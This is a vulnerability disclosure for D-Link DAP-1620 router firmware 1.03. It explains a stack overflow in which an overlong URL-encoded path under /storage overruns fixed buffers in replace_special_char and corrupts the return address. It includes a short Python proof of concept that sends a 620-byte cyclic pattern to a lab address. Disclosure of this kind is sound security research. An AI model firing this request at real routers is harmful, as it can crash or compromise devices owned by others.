| Firmware Name | Firmware Version | Download Link |
|---|---|---|
| DAP-1620 | DAP_1620_REVA_FIRMWARE_1.03 | https://legacyfiles.us.dlink.com/DAP-1620/REVA/Firmware/DAP-1620_REVA_FIRMWARE_1.03.B08.ZIP |
This vulnerability is triggered due to a stack overflow in the replace_special_char function, causing the function to return to an abnormal address.
The router receives an HTTP request, and the http_request_parse function is called.
Within http_request_parse, the check_dws_cookie function is invoked at address 0x414BD0, which checks if the request path starts with /storage. If true, it proceeds.
The code then runs memset(input_str, 0, sizeof(input_str)); and strcpy(input_str, *(char **)connection->request.http_range);, with input_str being 1024 bytes. If connection->request.http_range exceeds 1024 bytes, a buffer overflow occurs here, potentially leading to a reboot, as noted.
Subsequently, the execution enters replace_special_char, where the decoded string is stored in output_buffer (600 bytes). If the decoded string from the input (after processing %xx sequences) is longer than 600 bytes, another stack overflow occurs in replace_special_char, corrupting the return address.
This chain of events highlights how the vulnerability can be exploited by crafting a malicious HTTP request with a long URL-encoded path, especially one that decodes to a string exceeding 600 bytes after processing.
import requests
from pwn import *
ip = "172.17.0.3"
port = 80
url = f"http://{ip}:{port}/storage/{cyclic(620).decode('utf-8')}?"
print(requests.get(url).text)
The vulnerability was discovered by Professor Wei Zhou's team (IoTS&P Lab) from the School of Cyber Science and Engineering at Huazhong University of Science and Technology.